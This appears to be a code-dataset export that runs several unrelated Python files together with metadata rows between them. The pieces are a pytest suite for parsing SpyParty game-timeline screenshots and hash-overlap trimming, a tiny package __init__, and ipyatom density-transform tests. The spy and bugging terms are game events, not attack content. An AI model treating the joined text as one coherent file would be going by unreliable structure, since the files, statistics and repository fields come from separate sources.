(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"sniper",
"01:44.1",
"took shot.",
(Characters.Smallman,),
(1 * 60 + 44.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.SniperShot,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"01:40.9",
"sniper shot spy.",
(Characters.Smallman,),
(1 * 60 + 40.9),
None,
(Roles.Spy,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"clock_remaining",
[
(
"spy",
"01:51.5",
"begin planting bug while standing.",
(Characters.Wheels,),
(1 * 60 + 51.5),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"01:49.8",
"bugged ambassador while standing.",
(Characters.Wheels,),
(1 * 60 + 49.8),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.MissionComplete,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"01:48.9",
"action triggered: seduce target",
(None,),
(1 * 60 + 48.9),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:48.9",
"begin flirtation with seduction target.",
(Characters.Oprah,),
(1 * 60 + 48.9),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:48.2",
"action test white: seduce target",
(None,),
(1 * 60 + 48.2),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.White,
),
(
"spy",
"01:48.2",
"flirt with seduction target: 59%",
(Characters.Oprah,),
(1 * 60 + 48.2),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:35.8",
"spy leaves conversation.",
(None,),
95.8,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:35.8",
"spy left conversation with double agent.",
(Characters.Salmon,),
95.8,
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:30.6",
"spy enters conversation.",
(None,),
90.6,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:29.0",
"flirtation cooldown expired.",
(None,),
89.0,
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:03.3",
"spy leaves conversation.",
(None,),
63.3,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:57.6",
"spy enters conversation.",
(None,),
57.6,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:57.0",
"action triggered: seduce target",
(None,),
57.0,
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:57.0",
"begin flirtation with seduction target.",
(Characters.Oprah,),
57.0,
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:55.9",
"action test green: seduce target",
(None,),
55.9,
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"00:55.9",
"flirt with seduction target: 100%",
(Characters.Oprah,),
55.9,
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:55.9",
"target seduced.",
(Characters.Oprah,),
55.9,
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:43.9",
"spy leaves conversation.",
(None,),
43.9,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:39.3",
"picked up statue.",
(None,),
39.3,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:36.1",
"action triggered: swap statue",
(None,),
36.1,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"00:35.5",
"action test green: swap statue",
(None,),
35.5,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Swap,
ActionTest.Green,
),
(
"spy",
"00:35.5",
"statue swap pending.",
(None,),
35.5,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"game",
"00:35.5",
"missions completed. countdown pending.",
(None,),
35.5,
None,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:34.5",
"put back statue.",
(None,),
34.5,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:21.7",
"action triggered: check watch",
(None,),
21.7,
None,
(None,),
(None,),
TimelineCategory.Watch | TimelineCategory.ActionTriggered,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:21.7",
"watch checked.",
(Characters.Smallman,),
21.7,
None,
(Roles.Spy,),
(None,),
TimelineCategory.Watch,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:16.3",
"character picked up pending statue.",
(Characters.Bling,),
16.3,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"00:13.9",
"statue swapped.",
(Characters.Bling,),
13.9,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Swap,
ActionTest.NoAT,
),
(
"game",
"00:13.9",
"missions completed. 10 second countdown.",
(None,),
13.9,
None,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"00:03.9",
"missions completed successfully.",
(None,),
3.9,
None,
(None,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"clock_elapsed",
[
(
"spy",
"128.50",
"begin planting bug while standing.",
(Characters.Wheels,),
None,
128.50,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"130.13",
"bugged ambassador while standing.",
(Characters.Wheels,),
None,
130.13,
(Roles.Ambassador,),
(None,),
TimelineCategory.MissionComplete,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"131.06",
"action triggered: seduce target",
(None,),
None,
131.06,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"131.06",
"begin flirtation with seduction target.",
(Characters.Oprah,),
None,
131.06,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"131.75",
"action test white: seduce target",
(None,),
None,
131.75,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.White,
),
(
"spy",
"131.75",
"flirt with seduction target: 59%",
(Characters.Oprah,),
None,
131.75,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"144.19",
"spy leaves conversation.",
(None,),
None,
144.19,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"144.19",
"spy left conversation with double agent.",
(Characters.Salmon,),
None,
144.19,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"149.31",
"spy enters conversation.",
(None,),
None,
149.31,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"150.94",
"flirtation cooldown expired.",
(None,),
None,
150.94,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"176.63",
"spy leaves conversation.",
(None,),
None,
176.63,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"182.38",
"spy enters conversation.",
(None,),
None,
182.38,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"183.00",
"action triggered: seduce target",
(None,),
None,
183.0,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"183.00",
"begin flirtation with seduction target.",
(Characters.Oprah,),
None,
183.0,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"184.06",
"action test green: seduce target",
(None,),
None,
184.06,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"184.06",
"flirt with seduction target: 100%",
(Characters.Oprah,),
None,
184.06,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"184.06",
"target seduced.",
(Characters.Oprah,),
None,
184.06,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"196.06",
"spy leaves conversation.",
(None,),
None,
196.06,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"200.69",
"picked up statue.",
(None,),
None,
200.69,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"203.81",
"action triggered: swap statue",
(None,),
None,
203.81,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"204.50",
"action test green: swap statue",
(None,),
None,
204.50,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Swap,
ActionTest.Green,
),
(
"spy",
"204.50",
"statue swap pending.",
(None,),
None,
204.50,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"game",
"204.50",
"missions completed. countdown pending.",
(None,),
None,
204.50,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"205.50",
"put back statue.",
(None,),
None,
205.50,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"218.25",
"action triggered: check watch",
(None,),
None,
218.25,
(None,),
(None,),
TimelineCategory.Watch | TimelineCategory.ActionTriggered,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"218.25",
"watch checked.",
(Characters.Smallman,),
None,
218.25,
(Roles.Spy,),
(None,),
TimelineCategory.Watch,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"223.63",
"character picked up pending statue.",
(Characters.Bling,),
None,
223.63,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"226.06",
"statue swapped.",
(Characters.Bling,),
None,
226.06,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Swap,
ActionTest.NoAT,
),
(
"game",
"226.06",
"missions completed. 10 second countdown.",
(None,),
None,
226.06,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"236.06",
"missions completed successfully.",
(None,),
None,
236.06,
(None,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
]
@pytest.mark.parsing
@pytest.mark.parametrize("image_name, expecteds", SCREENSHOT_TEST_CASES)
def test_parse_timeline(
image_name: str,
expecteds: List[
Tuple[
str,
str,
str,
Tuple[Characters],
Optional[float],
Optional[float],
Tuple[Roles],
Tuple[Books],
TimelineCategory,
Missions,
ActionTest,
]
],
base_temp_dir,
):
screenshot_img = cv2.imread(
str(base_temp_dir.joinpath("test_screenshots", f"{image_name}.png").resolve())
)
timeline_events = parse_screenshot(screenshot_img)
assert len(timeline_events) == len(expecteds)
for event, exp in zip(timeline_events, expecteds):
(
e_actor,
e_raw_time_str,
e_event,
e_cast_name,
e_time_in_sec,
e_elapsed_time_in_sec,
e_role,
e_books,
e_category,
e_mission,
e_action_test,
) = exp
assert event.actor == e_actor
assert event._raw_time_str == e_raw_time_str
assert event.event == e_event
assert event.cast_name == e_cast_name
assert event.time == e_time_in_sec
assert event.elapsed_time == e_elapsed_time_in_sec
assert event.role == e_role
assert event.books == e_books
assert event.category == e_category
assert event.mission == e_mission
assert event.action_test == e_action_test
OVERLAP_HASH_TEST_CASES = [
([], 0),
# test case taken from
(
[
4898569955834637889,
-4414489284896555474,
-5683575663596673397,
-6727287813583471907,
6091366772103832389,
8372541563657396237,
-5998200551159387251,
-8350152916269273221,
8054318264316763706,
-7773028656705170379,
4857987452609043078,
2426212828938566709,
-9195684035214585113,
6262737924542373709,
-4462780260128884117,
4966964054850516428,
6310410009357200445,
-743246492690333081,
-7047028544218896895,
-5621347802322359969,
-6448705873843666124,
8297621253914253337,
1026440669783540158,
1473315671454268467,
-4555721104568928804,
7319079772568642287,
-6272454861391088382,
1202541922402720900,
-4791185849326570354,
-8648060616625656676,
6192524553168898821,
1095959189604413276,
-2487854583837734527,
6214444077178414495,
-6743699474363429090,
-7907129591594689933,
-3200233558801643978,
5548470840566651052,
-515246112565934050,
5552309446946592289,
3276521516792218876,
-6993507546958920025,
4237899588761139910,
8614420660470844145,
-3637992246739640041,
-3317205397768809852,
-6984375733142720586,
684784715920252680,
6464085402063056967,
-110423439490813070,
-9206787334010066531,
-8965393725341744810,
4795204757292903171,
-4853211488406126821,
-2809935517467852731,
-7701016839766834705,
-1956520985913015316,
-8856221326385893001,
-2606966940955522812,
-1595404463426174141,
1029605680750905825,
8482082510959136174,
-3384240464622680325,
-7013454046217635141,
2230081605807153069,
-1390917854947158567,
8341402324383349642,
3192202567968357689,
-436262288112376921,
-4565100090044904977,
-1731295948189016240,
3192202567968357689,
-436262288112376921,
-1032990216138025315,
2693125543119600033,
7368559427308120107,
5974161061667067404,
3270713386344843245,
-6153343156143776805,
-8048356150070767585,
8268265106128128142,
9045990381001798749,
-2197261469458339085,
-3980135260768034233,
-2248385609438602268,
-7941215634526514224,
-228472052116432376,
4611042632143558440,
3304821425538213324,
-2711734606293041948,
-436262288112376921,
-4565100090044904977,
-1731295948189016240,
3192202567968357689,
-436262288112376921,
-1032990216138025315,
2693125543119600033,
7368559427308120107,
5974161061667067404,
3270713386344843245,
-6153343156143776805,
-8048356150070767585,
8268265106128128142,
9045990381001798749,
-2197261469458339085,
-3980135260768034233,
-2248385609438602268,
-7941215634526514224,
-228472052116432376,
4611042632143558440,
3304821425538213324,
-2711734606293041948,
5733043846273024389,
-1646174301922479662,
8445266879889198574,
8936979800905005683,
5073970690446166680,
4002889492044046295,
5623320347751645624,
-3587251677524125944,
],
22,
),
(list(range(30)), 0),
(list(range(60)), 0),
(list(range(30)) + list(range(16, 46)), 14),
(list(range(30)) + list(range(30)), 30),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
],
13,
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
],
11,
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
2,
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
28,
28,
28,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
2,
),
]
@pytest.mark.parsing
@pytest.mark.parametrize(
"hashes, expected_num_overlapping_events", OVERLAP_HASH_TEST_CASES
)
def test_find_overlap_last_page_index(
hashes: List[int], expected_num_overlapping_events: int
):
num_overlapping_events = find_overlap_last_page_index(hashes)
assert num_overlapping_events == expected_num_overlapping_events
TRIM_OVERLAP_TEST_CASES = [
([], 0, []),
# test case taken from
(
[
4898569955834637889,
-4414489284896555474,
-5683575663596673397,
-6727287813583471907,
6091366772103832389,
8372541563657396237,
-5998200551159387251,
-8350152916269273221,
8054318264316763706,
-7773028656705170379,
4857987452609043078,
2426212828938566709,
-9195684035214585113,
6262737924542373709,
-4462780260128884117,
4966964054850516428,
6310410009357200445,
-743246492690333081,
-7047028544218896895,
-5621347802322359969,
-6448705873843666124,
8297621253914253337,
1026440669783540158,
1473315671454268467,
-4555721104568928804,
7319079772568642287,
-6272454861391088382,
1202541922402720900,
-4791185849326570354,
-8648060616625656676,
6192524553168898821,
1095959189604413276,
-2487854583837734527,
6214444077178414495,
-6743699474363429090,
-7907129591594689933,
-3200233558801643978,
5548470840566651052,
-515246112565934050,
5552309446946592289,
3276521516792218876,
-6993507546958920025,
4237899588761139910,
8614420660470844145,
-3637992246739640041,
-3317205397768809852,
-6984375733142720586,
684784715920252680,
6464085402063056967,
-110423439490813070,
-9206787334010066531,
-8965393725341744810,
4795204757292903171,
-4853211488406126821,
-2809935517467852731,
-7701016839766834705,
-1956520985913015316,
-8856221326385893001,
-2606966940955522812,
-1595404463426174141,
1029605680750905825,
8482082510959136174,
-3384240464622680325,
-7013454046217635141,
2230081605807153069,
-1390917854947158567,
8341402324383349642,
3192202567968357689,
-436262288112376921,
-4565100090044904977,
-1731295948189016240,
3192202567968357689,
-436262288112376921,
-1032990216138025315,
2693125543119600033,
7368559427308120107,
5974161061667067404,
3270713386344843245,
-6153343156143776805,
-8048356150070767585,
8268265106128128142,
9045990381001798749,
-2197261469458339085,
-3980135260768034233,
-2248385609438602268,
-7941215634526514224,
-228472052116432376,
4611042632143558440,
3304821425538213324,
-2711734606293041948,
-436262288112376921,
-4565100090044904977,
-1731295948189016240,
3192202567968357689,
-436262288112376921,
-1032990216138025315,
2693125543119600033,
7368559427308120107,
5974161061667067404,
3270713386344843245,
-6153343156143776805,
-8048356150070767585,
8268265106128128142,
9045990381001798749,
-2197261469458339085,
-3980135260768034233,
-2248385609438602268,
-7941215634526514224,
-228472052116432376,
4611042632143558440,
3304821425538213324,
-2711734606293041948,
5733043846273024389,
-1646174301922479662,
8445266879889198574,
8936979800905005683,
5073970690446166680,
4002889492044046295,
5623320347751645624,
-3587251677524125944,
],
22,
[
4898569955834637889,
-4414489284896555474,
-5683575663596673397,
-6727287813583471907,
6091366772103832389,
8372541563657396237,
-5998200551159387251,
-8350152916269273221,
8054318264316763706,
-7773028656705170379,
4857987452609043078,
2426212828938566709,
-9195684035214585113,
6262737924542373709,
-4462780260128884117,
4966964054850516428,
6310410009357200445,
-743246492690333081,
-7047028544218896895,
-5621347802322359969,
-6448705873843666124,
8297621253914253337,
1026440669783540158,
1473315671454268467,
-4555721104568928804,
7319079772568642287,
-6272454861391088382,
1202541922402720900,
-4791185849326570354,
-8648060616625656676,
6192524553168898821,
1095959189604413276,
-2487854583837734527,
6214444077178414495,
-6743699474363429090,
-7907129591594689933,
-3200233558801643978,
5548470840566651052,
-515246112565934050,
5552309446946592289,
3276521516792218876,
-6993507546958920025,
4237899588761139910,
8614420660470844145,
-3637992246739640041,
-3317205397768809852,
-6984375733142720586,
684784715920252680,
6464085402063056967,
-110423439490813070,
-9206787334010066531,
-8965393725341744810,
4795204757292903171,
-4853211488406126821,
-2809935517467852731,
-7701016839766834705,
-1956520985913015316,
-8856221326385893001,
-2606966940955522812,
-1595404463426174141,
1029605680750905825,
8482082510959136174,
-3384240464622680325,
-7013454046217635141,
2230081605807153069,
-1390917854947158567,
8341402324383349642,
3192202567968357689,
-436262288112376921,
-4565100090044904977,
-1731295948189016240,
3192202567968357689,
-436262288112376921,
-1032990216138025315,
2693125543119600033,
7368559427308120107,
5974161061667067404,
3270713386344843245,
-6153343156143776805,
-8048356150070767585,
8268265106128128142,
9045990381001798749,
-2197261469458339085,
-3980135260768034233,
-2248385609438602268,
-7941215634526514224,
-228472052116432376,
4611042632143558440,
3304821425538213324,
-2711734606293041948,
5733043846273024389,
-1646174301922479662,
8445266879889198574,
8936979800905005683,
5073970690446166680,
4002889492044046295,
5623320347751645624,
-3587251677524125944,
],
),
(list(range(30)), 0, list(range(30))),
(list(range(60)), 0, list(range(60))),
(list(range(30)) + list(range(16, 46)), 14, list(range(46))),
(list(range(30)) + list(range(30)), 30, list(range(30))),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
],
13,
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
],
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
],
11,
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
],
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
2,
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
28,
28,
28,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
2,
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
28,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
),
]
@pytest.mark.parsing
@pytest.mark.parametrize(
"hashes, num_overlapping_events, trimmed_hashes", TRIM_OVERLAP_TEST_CASES
)
def test_trim_overlapped_list(hashes, num_overlapping_events, trimmed_hashes):
assert trimmed_hashes == trim_overlapped_list(hashes, num_overlapping_events)
| 28.083352
| 86
| 0.323521
| 14,870
| 254,716
| 5.532482
| 0.032011
| 0.060096
| 0.093195
| 0.132263
| 0.931893
| 0.8955
| 0.860444
| 0.810169
| 0.776183
| 0.735815
| 0
| 0.134263
| 0.574196
| 254,716
| 9,069
| 87
| 28.086448
| 0.624254
| 0.000161
| 0
| 0.867293
| 0
| 0
| 0.086609
| 0.000298
| 0
| 0
| 0
| 0
| 0.001547
| 1
| 0.000331
| false
| 0
| 0.001215
| 0
| 0.001547
| 0.005967
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
17424bb4fb5d98583bbc38888af5b4fd94f0888f
| 93
|
py
|
Python
|
from_root/utils/__init__.py
|
EduardKononov/from-root
|
eb80e93a31861217162705a4250a5f73c3821cbc
|
[
"MIT"
] | 7
|
2021-03-26T13:11:48.000Z
|
2022-02-15T10:20:43.000Z
|
from_root/utils/__init__.py
|
EduardKononov/from-root
|
eb80e93a31861217162705a4250a5f73c3821cbc
|
[
"MIT"
] | null | null | null |
from_root/utils/__init__.py
|
EduardKononov/from-root
|
eb80e93a31861217162705a4250a5f73c3821cbc
|
[
"MIT"
] | 1
|
2021-07-20T12:56:48.000Z
|
2021-07-20T12:56:48.000Z
|
from from_root.utils.all_dirs_exists import *
from from_root.utils.get_project_root import *
| 31
| 46
| 0.849462
| 16
| 93
| 4.5625
| 0.5625
| 0.219178
| 0.328767
| 0.465753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086022
| 93
| 2
| 47
| 46.5
| 0.858824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
177cac7a5f7d726ae42917284e0047848e8c02a3
| 18,305
|
py
|
Python
|
ipyatom/test_repeat_density.py
|
chrisjsewell/ipyatom
|
a4cc9e1c7aecaf18eaa510bba2adb4ca3da63a2f
|
[
"MIT"
] | null | null | null |
ipyatom/test_repeat_density.py
|
chrisjsewell/ipyatom
|
a4cc9e1c7aecaf18eaa510bba2adb4ca3da63a2f
|
[
"MIT"
] | null | null | null |
ipyatom/test_repeat_density.py
|
chrisjsewell/ipyatom
|
a4cc9e1c7aecaf18eaa510bba2adb4ca3da63a2f
|
[
"MIT"
] | null | null | null |
import numpy as np
import pytest
from ase.atoms import Atoms
from ase.build import bulk as ase_bulk
from ejplugins.utils import load_test_file
from ipyatom.repeat_density import ejdata_to_dict, cubesliceplane, atoms_to_rdensity
from ipyatom.transforms import add_repeat, apply_transforms, add_resize, add_slice
from ipyatom.validation import process_vstruct
from jsonextended import plugins
from jsonextended.encoders.ndarray import Encode_NDArray
@pytest.fixture("function")
def quantum_espresso():
with plugins.plugins_context([Encode_NDArray]):
ejdata = load_test_file("scf.qe.charge.json")
# edict.pprint(data)
return ejdata
@pytest.fixture("function")
def crystal14():
with plugins.plugins_context([Encode_NDArray]):
ejdata = load_test_file("crystal.ech3_dat.prop3d.json")
# edict.pprint(data)
return ejdata
# a better way to do this is in the works: https://docs.pytest.org/en/latest/proposals/parametrize_with_fixtures.html
@pytest.fixture(params=['quantum_espresso', 'crystal14'])
def ejdata(request):
return request.getfuncargvalue(request.param)
def test_ejdata_to_dict(ejdata):
dct = ejdata_to_dict(ejdata, retrieve_atoms=False)
assert "elements" in dct
assert len(dct["elements"]) > 0
process_vstruct(dct, eltypes=["repeat_density"])
def test_ejdata_to_dict_with_atoms(quantum_espresso):
dct = ejdata_to_dict(quantum_espresso, retrieve_atoms=True)
assert "elements" in dct
assert len(dct["elements"]) == 2
process_vstruct(dct, eltypes=["repeat_density", "repeat_cell"])
def test_transforms_repeat(quantum_espresso):
""" see doctests for more specific tests
"""
dct = ejdata_to_dict(quantum_espresso, retrieve_atoms=False)
assert dct["elements"][0]["dcube"].shape == (45, 45, 45)
add_repeat(dct, (2, 1, 1))
dct = apply_transforms(dct)
assert dct["elements"][0]["dcube"].shape == (135, 90, 90)
def test_transforms_resize(quantum_espresso):
""" see doctests for more specific tests
"""
dct = ejdata_to_dict(quantum_espresso, retrieve_atoms=False)
assert dct["elements"][0]["dcube"].shape == (45, 45, 45)
add_resize(dct, .49)
dct = apply_transforms(dct)
assert dct["elements"][0]["dcube"].shape == (22, 22, 22)
